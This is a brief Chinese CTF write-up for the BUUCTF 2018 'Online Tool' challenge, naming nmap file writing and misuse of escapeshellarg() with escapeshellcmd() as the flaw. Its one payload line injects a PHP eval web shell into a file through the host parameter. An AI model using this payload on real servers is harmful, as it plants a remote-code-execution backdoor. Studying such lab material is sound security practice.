『CTF Web复现』[BUUCTF 2018]Online Tool利用点代码审计解题Payload完 @[toc]# 利用点 - nmap写文件 - escapeshellarg() + escapeshellcmd()使用不当# Payload```[GET]http://URL/?host='<?php eval($_POST[a]);?> -oG 1.php '``` # CTF-Web 2023-12-19 51 点赞 0 评论 77 浏览